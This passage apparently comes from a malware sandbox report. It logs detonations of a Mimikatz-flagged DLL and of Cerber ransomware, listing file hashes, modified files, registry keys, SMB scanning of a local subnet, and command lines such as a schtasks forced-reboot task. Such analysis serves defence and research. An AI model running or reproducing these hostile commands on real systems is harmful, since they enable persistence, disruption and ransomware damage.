N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/2816-0-0x0000000000280000-0x00000000002DE000-memory.dmp

memory/2816-8-0x0000000000280000-0x00000000002DE000-memory.dmp

\Users\Admin\AppData\Local\Temp\6F75.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2816-9-0x0000000000280000-0x00000000002DE000-memory.dmp

memory/2816-11-0x0000000000280000-0x00000000002DE000-memory.dmp

memory/2816-26-0x0000000000280000-0x00000000002DE000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D67A.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\SyncDebug.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\HideTrace.ppt C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\NewUninstall.asp C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\RestartUninstall.xlsx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\ResolveHide.pptx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\StepClear.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\HideConnect.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D67A.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

C:\Users\Admin\AppData\Local\Temp\D67A.tmp

"C:\Users\Admin\AppData\Local\Temp\D67A.tmp" \\.\pipe\{E071154B-8F26-4C9C-925C-1BD2CD1E223F}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
N/A 10.127.0.0:445 tcp
US 52.167.249.196:445 settings-win.data.microsoft.com tcp
N/A 10.127.0.1:445 tcp
FI 37.27.61.182:445 tcp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 52.167.249.196:139 settings-win.data.microsoft.com tcp
FI 37.27.61.182:139 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/3248-0-0x0000000002A10000-0x0000000002A6E000-memory.dmp

memory/3248-8-0x0000000002A10000-0x0000000002A6E000-memory.dmp

memory/3248-12-0x0000000002A10000-0x0000000002A6E000-memory.dmp

memory/3248-9-0x0000000002A10000-0x0000000002A6E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D67A.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/3248-22-0x0000000002A10000-0x0000000002A6E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

Signatures

Cerber

ransomware cerber

Cerber family

cerber

Contacts a large (1100) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpB91E.bmp" C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
